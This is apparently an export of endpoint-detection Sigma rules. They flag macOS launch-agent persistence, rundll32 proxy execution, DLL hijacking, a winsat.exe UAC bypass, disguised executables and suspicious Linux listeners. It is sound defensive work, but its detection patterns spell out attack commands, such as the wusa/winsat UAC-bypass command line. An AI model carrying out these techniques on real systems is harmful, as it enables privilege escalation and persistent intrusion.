"last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093364Z", "creation_date": "2026-03-23T11:45:34.093366Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093370Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1543/001/", "https://attack.mitre.org/techniques/T1543/004/" ], "name": "t1543_001_launch_agents_created_plistbuddy.yml", "content": "title: Launch Agent/Daemon Created via PlistBuddy\nid: 08393432-4fef-4e8b-aa5e-fc13131e09c3\ndescription: |\n Detects the creation of a launch agent or daemon using PlistBuddy.\n Adversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\n It is recommended to check the content of the newly created plist file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.t1543.004\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Tool.PlistBuddy\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Path|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n - '/private/var/root/Library/LaunchAgents/'\n - '/Library/User Template/Library/LaunchAgents/'\n Kind: 'create'\n ProcessImage|endswith: '/PlistBuddy'\n\n condition: all of selection_*\nlevel: medium\n#level: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "08393432-4fef-4e8b-aa5e-fc13131e09c3", "rule_name": "Launch Agent/Daemon Created via PlistBuddy", "rule_description": "Detects the creation of a launch agent or daemon using PlistBuddy.\nAdversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\nIt is recommended to check the content of the newly created plist file for malicious content.\n", "rule_creation_date": "2024-06-18", "rule_modified_date": "2025-01-20", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1543.001", "attack.t1543.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0850e834-f366-4ebb-a022-79bc7b74fc1a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.069400Z", "creation_date": "2026-03-23T11:45:34.069403Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.069410Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Libraries/Ieframe/", "https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268", "https://attack.mitre.org/techniques/T1218/011/" ], "name": "t1218_011_rundll32_ieframe_proxy_execution.yml", "content": "title: Proxy Execution via ieframe.dll\nid: 0850e834-f366-4ebb-a022-79bc7b74fc1a\ndescription: |\n Detects a suspicious invocation of ieframe.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Ieframe/\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/10/17\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Ieframe\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n ProcessParentOriginalFileName: 'rundll32.exe'\n\n selection_ieframe:\n ParentCommandLine|contains:\n - ' ieframe,'\n - ' ieframe.dll,'\n\n selection_function:\n ParentCommandLine|contains: 'OpenURL'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0850e834-f366-4ebb-a022-79bc7b74fc1a", "rule_name": "Proxy Execution via ieframe.dll", "rule_description": "Detects a suspicious invocation of ieframe.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\n", "rule_creation_date": "2025-10-17", "rule_modified_date": "2025-10-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1216.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "085b257b-644f-4cc1-bc25-578447cf5bf2", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.589223Z", "creation_date": "2026-03-23T11:45:34.589227Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.589234Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_sihclient.yml", "content": "title: DLL Hijacking via sihclient.exe\nid: 085b257b-644f-4cc1-bc25-578447cf5bf2\ndescription: |\n Detects potential Windows DLL Hijacking via sihclient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sihclient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\dnsapi.dll'\n - '\\winhttp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "085b257b-644f-4cc1-bc25-578447cf5bf2", "rule_name": "DLL Hijacking via sihclient.exe", "rule_description": "Detects potential Windows DLL Hijacking via sihclient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0882e820-0755-4f74-94e4-b9ae77d3294d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.598454Z", "creation_date": "2026-03-23T11:45:34.598457Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.598465Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1595/" ], "name": "t1595_wifi_scanning_airport_macos.yml", "content": "title: Wi-Fi Networks Scanned via airport\nid: 0882e820-0755-4f74-94e4-b9ae77d3294d\ndescription: |\n Detects the execution of the airport command to scan nearby Wi-Fi networks.\n Attackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1595/\ndate: 2024/07/03\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|contains: '/airport'\n CommandLine|contains: ' -s'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0882e820-0755-4f74-94e4-b9ae77d3294d", "rule_name": "Wi-Fi Networks Scanned via airport", "rule_description": "Detects the execution of the airport command to scan nearby Wi-Fi networks.\nAttackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\nIt is recommended to check for other suspicious activity by the parent process.\n", "rule_creation_date": "2024-07-03", "rule_modified_date": "2025-01-20", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [], "rule_technique_tags": [ "attack.t1595" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.081044Z", "creation_date": "2026-03-23T11:45:34.081047Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.081051Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1204/002/", "https://attack.mitre.org/techniques/T1036/007/" ], "name": "t1036_007_executable_with_multiple_extension.yml", "content": "title: PE with Multiple Extensions Executed\nid: 08c82317-1fb0-42b6-b3cc-cf85ace1deb8\ndescription: |\n Detects the execution of a suspicious executable with multiple extensions.\n Attackers can add multiple extensions to an executable file to lure users into double clicking on the file.\n Since Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\n It is recommended to analyze the executed file to determine whether its execution is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1036/007/\ndate: 2021/03/30\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1036.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|re: '(?i)\\.(?:xlsx?|pptx?|docx?|pdf|zip|rar|7z|png|jpe?g|bmp|gif|psd|tiff)\\s{0,4}\\.exe$'\n\n exclusion_ranorex:\n Image|endswith: '\\Ranorex.PDF.exe'\n OriginalFileName: 'Ranorex.PDF.exe'\n InternalName: 'Ranorex.PDF.exe'\n\n exclusion_portablegit:\n Image|endswith: '\\PortableGit-*.7z.exe'\n Signature: 'Johannes Schindelin'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8", "rule_name": "PE with Multiple Extensions Executed", "rule_description": "Detects the execution of a suspicious executable with multiple extensions.\nAttackers can add multiple extensions to an executable file to lure users into double clicking on the file.\nSince Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\nIt is recommended to analyze the executed file to determine whether its execution is legitimate.\n", "rule_creation_date": "2021-03-30", "rule_modified_date": "2025-02-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution" ], "rule_technique_tags": [ "attack.t1036.007", "attack.t1204.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "08ddafaf-401d-4c3d-9389-e96925e90f0f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.628428Z", "creation_date": "2026-03-23T11:45:34.628430Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.628434Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.elastic.co/security-labs/inital-research-of-jokerspy", "https://attack.mitre.org/techniques/T1204/002/", "https://attack.mitre.org/techniques/T1564/001/" ], "name": "t1204_002_shared_folder_execution.yml", "content": "title: File Executed from Users Shared Folder\nid: 08ddafaf-401d-4c3d-9389-e96925e90f0f\ndescription: |\n Detects the execution of a file from the Users shared folder.\n Adversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\n It is recommended to check the executed process and its parents/children for malicious behavior.\nreferences:\n - https://www.elastic.co/security-labs/inital-research-of-jokerspy\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/05/10\nmodified: 2025/09/24\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|startswith: '/Users/shared/'\n GrandparentImage|contains: '?'\n\n # This is handled by the rule d44c6de2-d37f-4e36-8fa1-f23231dd7632\n filter_launchd:\n ProcessParentImage: '/sbin/launchd'\n\n exclusion_relocated:\n Image|startswith: '/Users/Shared/Relocated Items/Security/Applications/'\n GrandparentImage:\n - '/sbin/launchd'\n - '/Users/Shared/Relocated Items/Security/Applications/*'\n\n exclusion_gimp:\n ProcessGrandparentImage: '/Users/Shared/Previously Relocated Items/Security/GIMP.app/Contents/MacOS/GIMP-bin'\n # todo: add signature\n\n exclusion_logioption:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.logi.optionsplus.*'\n\n exclusion_hotreload:\n ProcessGrandparentImage:\n - '/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/MacOS/HotReload'\n - '/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/Resources/CodePatcherCLI'\n # todo: add signature\n\n exclusion_riotgames:\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper (Renderer).app/Contents/MacOS/Riot Client Helper (Renderer)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper (GPU).app/Contents/MacOS/Riot Client Helper (GPU)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper.app/Contents/MacOS/Riot Client Helper'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Electron Framework.framework/Versions/A/Helpers/chrome_crashpad_handler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - Image: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientCrashHandler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/macos/riot client'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/frameworks/riot client helper (renderer).app/contents/macos/riot client helper (renderer)'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.riotgames.RiotGames.*'\n\n exclusion_lghub:\n - ParentImage: '/Applications/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n - Image: '/Users/Shared/LGHUB/depots/*/core/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n exclusion_battlenet:\n Image: '/Users/Shared/Battle.net/Agent/Agent.app/Contents/MacOS/Switcher'\n\n exclusion_wizards:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.wizards.mtga'\n\n exclusion_maxon:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'net.maxon.maxonapp.installer'\n\n exclusion_gog:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.gog.galaxy.updater'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "08ddafaf-401d-4c3d-9389-e96925e90f0f", "rule_name": "File Executed from Users Shared Folder", "rule_description": "Detects the execution of a file from the Users shared folder.\nAdversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\nIt is recommended to check the executed process and its parents/children for malicious behavior.\n", "rule_creation_date": "2024-05-10", "rule_modified_date": "2025-09-24", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution" ], "rule_technique_tags": [ "attack.t1204.002", "attack.t1564.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "08e4776f-548a-4b01-8538-c2af435dce4b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093473Z", "creation_date": "2026-03-23T11:45:34.093475Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093479Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198" ], "name": "t1548_002_uac_bypass_winsat.yml", "content": "title: UAC Bypass Executed via winsat.exe\nid: 08e4776f-548a-4b01-8538-c2af435dce4b\ndescription: |\n Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\n This UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198\ndate: 2025/01/31\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_prepare:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c wusa ?:\\Users\\\\*\\AppData\\Local\\Temp\\update.msu /extract:?:\\Windows\\system32\\sysprep\\'\n\n selection_exploit:\n CommandLine: '?:\\Windows\\system32\\sysprep\\winsat.exe'\n ProcessIntegrityLevel: 'High'\n ProcessParentIntegrityLevel: 'Medium'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "08e4776f-548a-4b01-8538-c2af435dce4b", "rule_name": "UAC Bypass Executed via winsat.exe", "rule_description": "Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\nThis UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\n", "rule_creation_date": "2025-01-31", "rule_modified_date": "2025-01-31", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.002", "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "08f3ae91-3811-4a4b-8f04-87302ca365c9", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.612661Z", "creation_date": "2026-03-23T11:45:34.612665Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.612672Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1571/", "https://attack.mitre.org/techniques/T1205/001/", "https://attack.mitre.org/techniques/T1104/" ], "name": "t1571_process_listen_connections_suspicious_path.yml", "content": "title: Process Started Listening for Incoming Connections from Suspicious Path\nid: 08f3ae91-3811-4a4b-8f04-87302ca365c9\ndescription: |\n Detects a process that starts listening for incoming connections from a suspicious path.\n Attackers may setup reverse shells listening for incoming connections as a persistence and C2 mechanism.\n It is recommended to ensure the process had legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://attack.mitre.org/techniques/T1571/\n - https://attack.mitre.org/techniques/T1205/001/\n - https://attack.mitre.org/techniques/T1104/\ndate: 2023/12/15\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1571\n - attack.t1104\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - classification.Linux.Source.NetworkListen\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: network_listen\n product: linux\ndetection:\n\n selection:\n ProcessImage|startswith:\n - '/tmp/'\n - '/var/'\n - '/run/'\n - '/root/'\n - '/dev/shm/'\n - '/boot/'\n\n filter_var:\n ProcessImage|startswith:\n - '/var/lib/'\n - '/var/opt/'\n\n # Ports opened on localhost aren't considered suspicious\n filter_localhost:\n Address:\n - '127.0.0.1'\n - '::1'\n\n exclusion_java:\n # Java is embedded in so much application it becomes quickly unfeasable to list all of them\n ProcessImage|endswith: '/java'\n\n exclusion_hoptimal:\n ProcessImage: '/tmp/InstalleurVIDALHoptimalAndApi_unix_*/jre/bin/java'\n\n exclusion_go:\n # /tmp/go-build1480910053/b001/logsevents.test\n # /tmp/go-build3216331136/b001/schedulerd.test\n Image|startswith: '/tmp/go-build*/????/'\n\n exclusion_plz_sandbox:\n ProcessImage|startswith: '/tmp/plz_sandbox/'\n\n exclusion_opcon:\n ProcessImage|startswith: '/tmp/opcon_agent/bin/'\n\n exclusion_jetbrains:\n ProcessImage: '/tmp/.mount_*/jetbrains-toolbox'\n\n exclusion_veeam:\n ProcessImage:\n - '/tmp/VeeamAgent*/veeamagent'\n - '/var/tmp/veeamagent*/veeamagent'\n\n exclusion_collabora_appimage:\n ProcessImage: '/tmp/appimage_extracted_*/usr/bin/coolwsd'\n\n exclusion_veeam_plugin_manager:\n ProcessParentImage: '/opt/veeam/VeeamPluginforOracleRMAN/RMANPluginManager'\n\n exclusion_ossec_ids:\n - ProcessImage:\n - '/var/ossec/bin/wazuh-remoted'\n - '/var/ossec/bin/wazuh-authd'\n - ProcessCommandLine: '/var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh_apid.py'\n\n 